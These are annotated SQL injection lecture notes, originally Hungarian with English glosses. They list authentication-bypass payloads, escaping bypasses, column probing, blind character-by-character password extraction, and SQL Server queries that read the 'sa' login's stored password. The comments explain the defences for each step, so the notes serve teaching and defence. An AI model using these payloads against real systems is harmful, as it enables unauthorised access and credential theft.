-- SQL injection lecture notes (Hungarian). These are fragments, not an executable script;
-- the English comments are review annotations and glosses, the original text is kept verbatim.
--
-- Root cause, visible on the very first line: the query text is built by concatenating
-- user-controlled values (usernev, password) into the SQL string. The fix is a parameterized
-- (prepared) statement with bound values; escaping quotes in the application is not a
-- substitute, and the \' example further down shows such an escaping scheme being bypassed.
-- The WHERE clause also compares the stored column to the raw password, which suggests the
-- column holds the plaintext password -- verify; store a salted hash and compare in the
-- application instead, so a successful injection cannot read credentials.
strsql = "SELECT * FROM tbl WHERE username='" + usernev + "' AND password='" + password +"';"
-- Query as it reaches the engine when the username field carries the injected text:
SELECT * FROM tbl WHERE username='' OR 1=1' AND password ='YYYYYYYYY';
' OR '1'='1
' OR 1=1--
-- hány oszlopa van a tablanak?
-- (gloss: how many columns does the table have?)
SELECT * FROM tbl WHERE username='' ORDER BY 3--
-- Parenthesised variant of the same vulnerable query; parentheses do not add any protection.
SELECT * FROM tbl WHERE (username='XXXXX') AND (password='YYYYYY');
' OR 1=1)--
SELECT * FROM tbl WHERE (username='' OR 1=1--) AND (password='YYYYYY');
-- Comment-terminator variants differ per engine (-- , # , /* ); a filter that blocks only one
-- of them is not a mitigation, binding parameters is.
' OR 1=1--
' OR 1=1#
' OR 1=1/*
" OR 1=1--
" OR 1=1#
" OR 1=1/*
' OR '1'='1
" OR "1"="1
SELECT * FROM tbl WHERE username='XXX' AND password='YYYY'
' OR 1=1--
-- Application that doubles single quotes: the doubled quote is a literal, so the next line
-- is still syntactically broken for the injected text.
SELECT * FROM tbl WHERE username=''' OR 1=1--' AND password='YYYY'
\' OR 1=1--
-- Backslash escaping is bypassed here: the engine (presumably SQL Server, given the sys.*
-- views below) does not treat \ as an escape character, so '\' closes the literal.
SELECT * FROM tbl WHERE username='\'' OR 1=1--' AND password='YYYY'
------------------
-- tudjuk meg a name felhasznalo jelszavat. password
-- (gloss: find out the password of the user "name".)
-- Blind (boolean) extraction: every query below is valid SQL and produces no error, so
-- suppressing database error messages alone does not stop it. On the detection side this
-- shows up as a burst of near-identical login queries differing in one character/position.
SELECT * FROM tbl WHERE username='name' AND password='a'--' AND password='YYYY'
-- 62^jelszo hossza
-- (gloss: 62 to the power of the password length)
SELECT * FROM tbl WHERE username='name' AND SUBSTRING(password,1,1)='a'-- AND password='YYYY'
-- 62*jelszo hossza
-- (gloss: 62 times the password length)
SELECT * FROM tbl WHERE username='name' AND SUBSTRING(password,1,1)>'a'-- AND password='YYYY'
-- 6*jelszo
-- (gloss: 6 times the password length)
SELECT * FROM tbl where username='name' AND ASCII(SUBSTRING(password,1,1))>128 -- AND password='YYYY'
-- power sql injector eleje vary vege
-- (gloss: Power SQL Injector -- prefix ("eleje"), variable part, suffix ("vege"))
name' password )--
-- vary:
-- The three metadata queries below read server-level state: the current batch text via
-- sys.dm_exec_sql_text / sys.sysprocesses, column metadata via sys.syscolumns, and the
-- "sa" login's stored password value from master..syslogins. None of these should be
-- reachable from an application login: run the application under a least-privilege
-- database user without VIEW SERVER STATE and without any access to master..syslogins.
-- The FOR XML forms presumably rely on the result or error text being echoed back to the
-- client; not surfacing database errors/results verbatim removes that channel (hedged).
(SELECT text FROM sys.dm_exec_sql_text(cast((select SQL_handle FROM sys.sysprocesses WHERE spid=@@spid) as varbinary(64))))
(SELECT name,xtype FROM sys.syscolumns WHERE id=object_id('tbl1') FOR XML AUTO)
(SELECT cast(password as varbinary(888)) as password from master..syslogins WHERE name='sa' FOR XML raw, binary base64)
-- UNION probing depends on the column count of the original SELECT * -- one more reason
-- to select an explicit column list, though only parameter binding actually fixes the hole.
UNION ALL SELECT NULL,NULL,NULL,NULL,NULL FROM tbl1--